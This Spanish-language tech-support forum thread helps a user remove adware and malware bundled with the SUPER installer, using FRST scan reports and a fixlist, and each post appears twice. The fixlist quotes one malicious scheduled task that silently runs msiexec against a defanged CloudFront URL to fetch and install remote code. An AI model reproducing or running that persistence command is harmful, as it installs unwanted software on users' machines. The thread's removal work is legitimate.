Mystarting123: un malware persistente
pixmagic
Mensajes publicados
99
Estado
Miembro
-
Destrio5 Mensajes publicados 99820 Fecha de registro Estado Moderador Última intervención -
Destrio5 Mensajes publicados 99820 Fecha de registro Estado Moderador Última intervención -
Hola a todos
aquí... he descargado el software SUPER desde su sitio... no presté atención al instalarlo y no vi que instaló una gran cantidad de malware... desde entonces, no consigo deshacerme de ello...
tenía, entonces, AVIRA (gratuito) que había estado utilizando durante 5 años sin ningún problema...
- lo he sustituido por Kaspersky... nada
- f_secure ... nada
=> estos 2 últimos detectan amenazas, las neutralizan pero después de reiniciar, los problemas reaparecen...
como pueden ver en la captura adjunta... no consigo deshacerme del problema...
no puedo eliminar los motores de búsqueda rodeados en rojo (no aparece la cruz a la derecha cuando paso el cursor del ratón por encima [a la derecha]).
+ he intentado usar la solución de Kaspersky (rescue disk) pero no sé por qué no funciona... en USB, siempre se bloquea después de arrancar con la llave USB.
he reiniciado Chrome... y de eso he perdido todos mis favoritos...
pero el problema sigue ahí.
*
Gracias por ayudarme con sus consejos.
aquí... he descargado el software SUPER desde su sitio... no presté atención al instalarlo y no vi que instaló una gran cantidad de malware... desde entonces, no consigo deshacerme de ello...
tenía, entonces, AVIRA (gratuito) que había estado utilizando durante 5 años sin ningún problema...
- lo he sustituido por Kaspersky... nada
- f_secure ... nada
=> estos 2 últimos detectan amenazas, las neutralizan pero después de reiniciar, los problemas reaparecen...
como pueden ver en la captura adjunta... no consigo deshacerme del problema...
no puedo eliminar los motores de búsqueda rodeados en rojo (no aparece la cruz a la derecha cuando paso el cursor del ratón por encima [a la derecha]).
+ he intentado usar la solución de Kaspersky (rescue disk) pero no sé por qué no funciona... en USB, siempre se bloquea después de arrancar con la llave USB.
he reiniciado Chrome... y de eso he perdido todos mis favoritos...
pero el problema sigue ahí.
*
- adwcleaner_6.047 encuentra de 7 a 8 amenazas que neutraliza pero cuando reinicio las mismas amenazas regresan...
- afortunadamente tengo Ubuntu (Linux) en dual boot... de lo contrario lo habría perdido todo. desde las últimas amenazas, tengo todos mis archivos en la nube... ¡nunca se sabe...!
Gracias por ayudarme con sus consejos.
3 respuestas
Hola,
--> Descarga Farbar Recovery Scan Tool (de Farbar) en tu Escritorio.
Atención: debes elegir la versión compatible con tu sistema: 32 o 64 bits.
¿32 o 64 bits - Cómo saberlo?
--> Cierra todas las aplicaciones en ejecución.
--> Ejecuta FRST (En Windows Vista/7/8/10, clic derecho en FRST > Ejecutar como administrador).
--> Marca la casilla Addition.txt.
--> Haz clic en Analizar.
--> Una vez que el análisis haya terminado, habrá dos informes FRST.txt y Addition.txt en el Escritorio.
--> Sube los dos informes a pjjoint.malekal.com y copia y pega los enlaces proporcionados en tu próxima respuesta.
--> Descarga Farbar Recovery Scan Tool (de Farbar) en tu Escritorio.
Atención: debes elegir la versión compatible con tu sistema: 32 o 64 bits.
¿32 o 64 bits - Cómo saberlo?
--> Cierra todas las aplicaciones en ejecución.
--> Ejecuta FRST (En Windows Vista/7/8/10, clic derecho en FRST > Ejecutar como administrador).
--> Marca la casilla Addition.txt.
--> Haz clic en Analizar.
--> Una vez que el análisis haya terminado, habrá dos informes FRST.txt y Addition.txt en el Escritorio.
--> Sube los dos informes a pjjoint.malekal.com y copia y pega los enlaces proporcionados en tu próxima respuesta.
Buenas noches
creo que he encontrado una solución que funciona...
encontré esto en un foro:
https://www.nicolascoolman.com/fr/download/resetbrowser/
descarga la aplicación... ejecútala en modo Admin
y restablecerá todos los navegadores instalados.
yo he recuperado todos mis favoritos que habían desaparecido y me encuentro con navegadores totalmente nuevos.
creo que he encontrado una solución que funciona...
encontré esto en un foro:
https://www.nicolascoolman.com/fr/download/resetbrowser/
descarga la aplicación... ejecútala en modo Admin
y restablecerá todos los navegadores instalados.
yo he recuperado todos mis favoritos que habían desaparecido y me encuentro con navegadores totalmente nuevos.
Hay otras infecciones.
Dado que has utilizado ResetBrowser entre tanto, ¿puedes hacerme nuevamente los informes FRST / Addition?
Dado que has utilizado ResetBrowser entre tanto, ¿puedes hacerme nuevamente los informes FRST / Addition?
hola
anoche hice un escaneo con una llave usb rescue key de Panda Security... tomó unas 2 horas y algo de escaneo... Panda encontró 4 infecciones (troyanos) que desinfectó (pero están en archivos comprimidos que solo usé una vez hace unos meses) lo cual es un poco sorprendente... sé que es el log. Super que es la fuente de la infección!
bueno, aquí está el archivo Addidion:
https://pjjoint.malekal.com/files.php?id=20170529_6j11r6w13i8
https://pjjoint.malekal.com/files.php?id=FRST_20170529_m5q5i10g13i6
en este momento, no tengo ningún problema de navegación.
anoche hice un escaneo con una llave usb rescue key de Panda Security... tomó unas 2 horas y algo de escaneo... Panda encontró 4 infecciones (troyanos) que desinfectó (pero están en archivos comprimidos que solo usé una vez hace unos meses) lo cual es un poco sorprendente... sé que es el log. Super que es la fuente de la infección!
bueno, aquí está el archivo Addidion:
https://pjjoint.malekal.com/files.php?id=20170529_6j11r6w13i8
https://pjjoint.malekal.com/files.php?id=FRST_20170529_m5q5i10g13i6
en este momento, no tengo ningún problema de navegación.
"Copernic Desktop Search 4"
--> ¿Este software es deseado?
Sí, el instalador de SUPER ofrece muchas porquerías :(
--> Abre el Bloc de notas (Inicio => Todos los programas => Accesorios => Bloc de notas).
--> Copia y pega el texto en negrita a continuación en el Bloc de notas:
start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-18\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
C:\Program Files\Common Files\AV\Spybot - Search and Destroy
HKLM\...\Providers\oqfxjsqv: C:\Program Files\Hetutain Monitor\local32spl.dll
C:\Program Files\Hetutain Monitor
ShellExecuteHooks: Sin nombre - {F5AFEDBA-3EB8-11E7-83D1-64006A5CFC23} - -> Sin archivo
BootExecute: autocheck autochk * sdnclean.exe
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_13-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0045-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
FF HKLM\...\Firefox\Extensions: [12x3q4@3244516.com] - C:\Program Files\Better-Surf\ff => no encontrado(a)
C:\Program Files\Better-Surf
FF HKLM\...\Firefox\Extensions: [ext@WebexpEnhancedV1alpha877.net] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha877\ff => no encontrado(a)
CHR HKLM\...\Chrome\Extension: [llpnacfkfgbdhapefgejnoabjhlebpgo] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha877\ch\WebexpEnhancedV1alpha877.crx <no encontrado(a)>
C:\Program Files\WebexpEnhancedV1
S2 terana; C:\Windows\System32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATENCIÓN (ServiceDLL no encontrado(a))
S2 WinSAPSvc; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATENCIÓN (ServiceDLL no encontrado(a))
C:\Users\magic\AppData\Local\terana
C:\Users\magic\AppData\Roaming\WinSAPSvc
C:\Program Files\{E0B67BD1-E050-49A3-A92E-673B1B2FDF2C}
C:\Users\Public\Documents\temp.dat
C:\Program Files\MIO
C:\ProgramData\Spybot - Search & Destroy
C:\ProgramData\KZMount
C:\Program Files\3SLT0QNUDP
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\极速压缩
C:\Users\magic\AppData\Roaming\Perbot
C:\Windows\system32\Drivers\vcdrom.sys
C:\Users\magic\AppData\Roaming\ServerTest
C:\Users\magic\AppData\Local\{6E6CCAF2-2D98-4BCE-8961-B60FC14F793A}
C:\Users\magic\AppData\Local\{C91BC81D-2FFC-4B8A-8BA6-CC0B9FF09CAA}
Task: {2BA1A751-6BD8-41C1-ADFC-953F4567D02F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Dicuiedghersapy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST3160212ACE_9LS5HZLDXXXX9LS5HZLD&d=20170525 /q <==== ATENCIÓN
Task: {7D6148BE-6970-4E80-B7A6-A9ADE81CBF84} - System32\Tasks\Hetutain Monitor => C:\Program Files\Rehakgekity\yaupdcache.exe
C:\Program Files\Rehakgekity
Task: {EA6B7D4B-6D2E-46C8-8F8D-250ED8D4D469} - System32\Tasks\Norton Product InstallerIdle => C:\Windows\system32\Adobe\Shockwave 12\SymInstallStub.exe
Task: C:\Windows\Tasks\Norton Product InstallerIdle.job => C:\Windows\system32\Adobe\Shockwave 12\SymInstallStub.exe
C:\Windows\system32\Adobe\Shockwave 12\SymInstallStub.exe
FirewallRules: [{FB35EB6B-CC45-4CC4-8E52-D1EE14A53F78}] => (Permitir) C:\Program Files\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{0FE8A1E2-BA72-40D3-B548-FFBC1DCDA29A}] => (Permitir) C:\Program Files\Hippig\Application\chrome.exe
FirewallRules: [{1DBAFFD7-11BF-4A9D-BD0A-7DC7B5AFB32C}] => (Permitir) C:\Program Files\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{7C3BE4A6-F332-4EF9-9180-FBEFEFE1D072}] => (Permitir) C:\Program Files\Firefox\Firefox.exe
EmptyTemp:
end
--> Guarda el archivo en la carpeta "Descargas" (en el mismo lugar que FRST) con el nombre fixlist.txt
--> Ejecuta FRST (En Windows Vista/7/8/10, haz clic derecho sobre FRST > Ejecutar como administrador).
--> Haz clic en Corregir. Espera el tiempo de la corrección.
Nota: si la herramienta necesita reiniciarse, acepta para que termine su trabajo.
--> Una vez finalizada la corrección, un informe Fixlog.txt reemplazará el archivo fixlist.
--> Aloja el informe en pjjoint.malekal.com y copia y pega el enlace proporcionado en tu próxima respuesta.
--> ¿Este software es deseado?
Sí, el instalador de SUPER ofrece muchas porquerías :(
--> Abre el Bloc de notas (Inicio => Todos los programas => Accesorios => Bloc de notas).
--> Copia y pega el texto en negrita a continuación en el Bloc de notas:
start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-18\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
C:\Program Files\Common Files\AV\Spybot - Search and Destroy
HKLM\...\Providers\oqfxjsqv: C:\Program Files\Hetutain Monitor\local32spl.dll
C:\Program Files\Hetutain Monitor
ShellExecuteHooks: Sin nombre - {F5AFEDBA-3EB8-11E7-83D1-64006A5CFC23} - -> Sin archivo
BootExecute: autocheck autochk * sdnclean.exe
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_13-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0045-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
FF HKLM\...\Firefox\Extensions: [12x3q4@3244516.com] - C:\Program Files\Better-Surf\ff => no encontrado(a)
C:\Program Files\Better-Surf
FF HKLM\...\Firefox\Extensions: [ext@WebexpEnhancedV1alpha877.net] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha877\ff => no encontrado(a)
CHR HKLM\...\Chrome\Extension: [llpnacfkfgbdhapefgejnoabjhlebpgo] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha877\ch\WebexpEnhancedV1alpha877.crx <no encontrado(a)>
C:\Program Files\WebexpEnhancedV1
S2 terana; C:\Windows\System32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATENCIÓN (ServiceDLL no encontrado(a))
S2 WinSAPSvc; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATENCIÓN (ServiceDLL no encontrado(a))
C:\Users\magic\AppData\Local\terana
C:\Users\magic\AppData\Roaming\WinSAPSvc
C:\Program Files\{E0B67BD1-E050-49A3-A92E-673B1B2FDF2C}
C:\Users\Public\Documents\temp.dat
C:\Program Files\MIO
C:\ProgramData\Spybot - Search & Destroy
C:\ProgramData\KZMount
C:\Program Files\3SLT0QNUDP
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\极速压缩
C:\Users\magic\AppData\Roaming\Perbot
C:\Windows\system32\Drivers\vcdrom.sys
C:\Users\magic\AppData\Roaming\ServerTest
C:\Users\magic\AppData\Local\{6E6CCAF2-2D98-4BCE-8961-B60FC14F793A}
C:\Users\magic\AppData\Local\{C91BC81D-2FFC-4B8A-8BA6-CC0B9FF09CAA}
Task: {2BA1A751-6BD8-41C1-ADFC-953F4567D02F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Dicuiedghersapy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST3160212ACE_9LS5HZLDXXXX9LS5HZLD&d=20170525 /q <==== ATENCIÓN
Task: {7D6148BE-6970-4E80-B7A6-A9ADE81CBF84} - System32\Tasks\Hetutain Monitor => C:\Program Files\Rehakgekity\yaupdcache.exe
C:\Program Files\Rehakgekity
Task: {EA6B7D4B-6D2E-46C8-8F8D-250ED8D4D469} - System32\Tasks\Norton Product InstallerIdle => C:\Windows\system32\Adobe\Shockwave 12\SymInstallStub.exe
Task: C:\Windows\Tasks\Norton Product InstallerIdle.job => C:\Windows\system32\Adobe\Shockwave 12\SymInstallStub.exe
C:\Windows\system32\Adobe\Shockwave 12\SymInstallStub.exe
FirewallRules: [{FB35EB6B-CC45-4CC4-8E52-D1EE14A53F78}] => (Permitir) C:\Program Files\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{0FE8A1E2-BA72-40D3-B548-FFBC1DCDA29A}] => (Permitir) C:\Program Files\Hippig\Application\chrome.exe
FirewallRules: [{1DBAFFD7-11BF-4A9D-BD0A-7DC7B5AFB32C}] => (Permitir) C:\Program Files\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{7C3BE4A6-F332-4EF9-9180-FBEFEFE1D072}] => (Permitir) C:\Program Files\Firefox\Firefox.exe
EmptyTemp:
end
--> Guarda el archivo en la carpeta "Descargas" (en el mismo lugar que FRST) con el nombre fixlist.txt
--> Ejecuta FRST (En Windows Vista/7/8/10, haz clic derecho sobre FRST > Ejecutar como administrador).
--> Haz clic en Corregir. Espera el tiempo de la corrección.
Nota: si la herramienta necesita reiniciarse, acepta para que termine su trabajo.
--> Una vez finalizada la corrección, un informe Fixlog.txt reemplazará el archivo fixlist.
--> Aloja el informe en pjjoint.malekal.com y copia y pega el enlace proporcionado en tu próxima respuesta.
hice lo que me indicaste y aquí están los 2 archivos:
Addition.txt =>
https://pjjoint.malekal.com/files.php?id=20170529_p15r8n13d6g10
FRST.txt =>
https://pjjoint.malekal.com/files.php?id=FRST_20170529_q10h8z15w15k10